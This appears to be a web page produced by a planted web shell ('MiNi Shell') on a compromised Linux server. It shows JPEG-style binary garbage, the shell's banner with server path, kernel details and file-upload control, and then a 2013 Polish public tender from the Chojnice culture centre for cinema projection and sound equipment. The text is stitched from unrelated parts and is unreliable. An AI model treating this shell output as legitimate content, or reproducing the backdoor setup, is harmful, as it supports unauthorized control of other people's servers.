JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130717/146323-N-2013.html

<p class="kh_header"><b>Chojnice: DOSTAWA SPRZĘTU DO PROJEKCJI CYFROWEJ, EKRANU I NAGŁOŚNIENIA KINOWEGO DLA CHOJNICKIEGO DOMU KULTURY</b><br>
<b>Numer ogłoszenia: 146323 - 2013; data zamieszczenia: 17.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Chojnicki Dom Kultury , ul. Swarożyca 1, 89-600 Chojnice, woj. pomorskie, tel. 0-52 3972215, faks 0-52 3972215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chdk-chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU DO PROJEKCJI CYFROWEJ, EKRANU I NAGŁOŚNIENIA KINOWEGO DLA CHOJNICKIEGO DOMU KULTURY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje:

a) dostawę i montaż zestawu kinowego do projekcji 2D i 3D w systemie pasywnym, 
b) dostawę i montaż ekranu do projekcji 3D na istniejącej konstrukcji metalowej, odpowiedniego do zaoferowanego projektora,
c) dostawę i montaż systemu nagłośnienia kinowego,
d) zestrojenie projektora z systemem nagłośnienia i zespołem ekranowym,
e) dostawę, instalację, uruchomienie i zestrojenie urządzeń wraz z przeszkoleniem pracowników w obsłudze zamówionego sprzętu.

Sprzęt dostarczony przez Wykonawcę ma być fabrycznie nowy, nieużywany, tj. nie był przedmiotem wystaw i prezentacji, nie obciążony prawami osób lub podmiotów trzecich, w ilości i o parametrach technicznych określonych w szczegółowym opisie przedmiotu zamówienia, stanowiącym Załącznik nr 1 do SIWZ.
Sprzęt dostarczony przez Wykonawcę musi być dopuszczony do sprzedaży w Polsce i posiadać certyfikaty zgodności z Polską Normą lub normami europejskimi.
Dostarczony sprzęt nie będzie posiadać wad fizycznych i prawnych oraz będzie gotowy do użytkowania bez żadnych dodatkowych zakupów i inwestycji obciążających zamawiającego.

Ponadto przedmiot zamówienia obejmuje:

a) uczestnictwo Wykonawcy podczas pierwszej projekcji u Zamawiającego, 
b) dostarczenie instrukcji obsługi, atestów, aprobat technicznych wraz z dokumentacją techniczną projektora (wszystko w języku polskim),
c) wykonanie zasilania, wentylacji w kabinie i wymiana okienka projekcyjnego,
d) udzielenie min. 36 miesięcy gwarancji i rękojmi na wszystkie dostarczone urządzenia,
e) dostarczenie Zamawiającemu w dniu odbioru przedmiotu umowy karty gwarancyjnej,
f) termin gwarancji ulega przedłużeniu w przypadku zgłoszenia reklamacji, o okres zaczynający się datą zgłoszenia jej na piśmie, a zakończony dniem odbioru przez Zamawiającego przedmiotu wolnego od wad, czy też usterek,
g) maksymalny termin realizacji usług serwisowych wynosi 12 godzin w dni robocze, 16 godzin w dni świąteczne. Przez termin realizacji usług serwisowych Zamawiający rozumie czas, w jakim Wykonawca jest zobowiązany usunąć zgłoszone usterki lub dostarczyć urządzenia zamienne,
h) świadczenie przeglądu gwarancyjnego minimum jeden raz w roku w okresie gwarancji (w ramach zamówienia i w ramach wynagrodzenia ofertowego),
i) świadczenie serwisu dotyczącego wykrytych usterek i wad przedmiotu zamówienia w okresie gwarancji,
j) świadczenie serwisu pogwarancyjnego (wg odrębnej umowy zawartej po okresie gwarancyjnym) oraz dostaw części zamiennych do przedmiotu zamówienia przez cały okres eksploatacji, nie krócej jednak niż 3 lata od upływu gwarancji. Czas dostępu do serwisu nie dłuższy niż 24 godziny,
k) zapewnienie 24-godzinnego zdalnego monitoringu na dostarczony sprzęt i zobowiązanie się Dostawcy do realizacji napraw oprogramowania w czasie rzeczywistym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.65.20.00-0, 32.34.24.00-6, 48.90.00.00-7, 38.60.00.00-1, 31.51.70.00-3, 30.20.00.00-1, 48.82.00.00-2, 51.11.00.00-6, 51.31.30.00-9, 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wskazanych w rozdz. VI SIWZ. Zamawiający podkreśla, że z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełni ustalone warunki udziału w postępowaniu.W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział wykonawcy, którzy spełniają warunki dotyczące:
- Posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z załącznikiem nr 2 do SIWZ . Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga specjalnych uprawnień. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wskazanych w rozdz. VI SIWZ. Zamawiający podkreśla, że z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełni ustalone warunki udziału w postępowaniu.W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział wykonawcy, którzy spełniają warunki dotyczące:
Posiadania niezbędnej wiedzy i doświadczenia do wykonania zadania. Zamawiający wymaga aby Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy dostawy odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia tj. dostawie wraz z montażem kinowym sprzętu cyfrowego zgodnego ze standardami DCI wraz z ekranem i nagłośnieniem o wartości nie mniejszej niż 400.000 zł brutto każda dostawa, z podaniem wartości, dat wykonania, podmiotów, na rzecz których dostawy zostały wykonane oraz z załączeniem dowodów potwierdzających, że dostawy te zostały wykonane należycie.
Jako 1 dostawę należy traktować zrealizowany zakres rzeczowy na podstawie jednorazowej umowy zawartej bezpośrednio pomiędzy wykonawcą a Zamawiającym. Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ oraz złożyć oświadczenie dot. przedmiotu zamówienia  zgodnie z załącznikiem nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wskazanych w rozdz. VI SIWZ. Zamawiający podkreśla, że z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełni ustalone warunki udziału w postępowaniu.W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą:spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wskazanych w rozdz. VI SIWZ. Zamawiający podkreśla, że z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełni ustalone warunki udziału w postępowaniu.W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą: spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach wskazanych w rozdz. VI SIWZ. Zamawiający podkreśla, że z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełni ustalone warunki udziału w postępowaniu.W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział wykonawcy, którzy spełniają warunki dotyczące:Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dostarczenie instrukcji obsługi, atestów, aprobat technicznych wraz z dokumentacją techniczną projektora (wszystko w języku polskim).
Udzielenie min. 36 miesięcy gwarancji i rękojmi na wszystkie dostarczone urządzenia.  
Dostarczenie Zamawiającemu w dniu odbioru przedmiotu umowy karty gwarancyjnej.
Świadczenie przeglądu gwarancyjnego minimum jeden raz w roku w okresie gwarancji (w ramach zamówienia i w ramach wynagrodzenia ofertowego).
Świadczenie serwisu dotyczącego wykrytych usterek i wad przedmiotu zamówienia w okresie gwarancji. 
Świadczenie serwisu pogwarancyjnego (wg odrębnej umowy zawartej po okresie gwarancyjnym) oraz dostaw części zamiennych do przedmiotu zamówienia przez cały okres eksploatacji, nie krócej jednak niż 3 lata od upływu gwarancji. Czas dostępu do serwisu nie dłuższy niż 24 godziny.
Zapewnienie 24-godzinnego zdalnego monitoringu na dostarczony sprzęt i zobowiązanie się Dostawcy do realizacji napraw oprogramowania w czasie rzeczywistym.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie na skutek wystąpienia poniższych okoliczności mogą dotyczyć następujących elementów umowy:
a.zmiana strony umowy, tylko w przypadku następstwa prawnego wynikającego z odrębnych przepisów,
b.zmiana terminu realizacji zamówienia:
- konieczność wykonania zamówień dodatkowych , od których jest uzależnione wykonanie zamówienia podstawowego;
- aktualizacja rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu;
- wystąpienie siły wyższej i innych zdarzeń nadzwyczajnych;
c.zmiany warunków i terminów płatności i inne:
- nieprzewidziany brak płynności finansowej u Zamawiającego, zmiana kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia;
- rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
- aktualizacja rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu;
- wystąpienie siły wyższej i innych zdarzeń nadzwyczajnych
Powyższe postanowienia wymienione w pkt. 4 lit. a. - c. stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Nie stanowi zmiany umowy, w rozumieniu art. 144 ustawy z dn. 29.01.2004r. - Prawo zamówień publicznych:
a. zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana rachunku bankowego),
b. zmiana danych teleadresowych, zmiany osób reprezentujących Strony.
Zmiana kluczowego personelu wykonawcy/zamawiającego oraz zmiana podwykonawców nie skutkują koniecznością zmiany umowy.
Jako siły wyższe uznaje się: klęski żywiołowe, huragan, powódź, katastrofy transportowe, pożar, eksplozje, wojna, strajk i inne nadzwyczajne wydarzenia, których zaistnienie leży poza zasięgiem i kontrolą układających się stron.
Jeżeli umawiające się strony nie mają możliwości wywiązania się z uzgodnionych terminów z powodów wymienionych w pkt. 6, to zachowują one prawo do wnioskowania o przesunięcie terminów wykonania usługi o czas trwania wydarzenia i o czas usunięcia jego skutków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chdk-chojnice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Chojnicki Dom Kultury, ul. Swarożyca 1, 89-600 Chojnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 12:00, miejsce: Chojnicki Dom Kultury, ul. Swarożyca 1, 89-600 Chojnice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany będzie z programu operacyjnego Polskiego Instytutu Sztuki Filmowej: Rozwój kin
- Cyfryzacja, nazwa zadania: Zakup sprzętu do projekcji cyfrowej dla Chojnickiego Domu Kultury
- Modernizacja kin, nazwa zadania: Zakup ekranu i systemu nagłośnienia kinowego dla Chojnickiego Domu Kultury.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com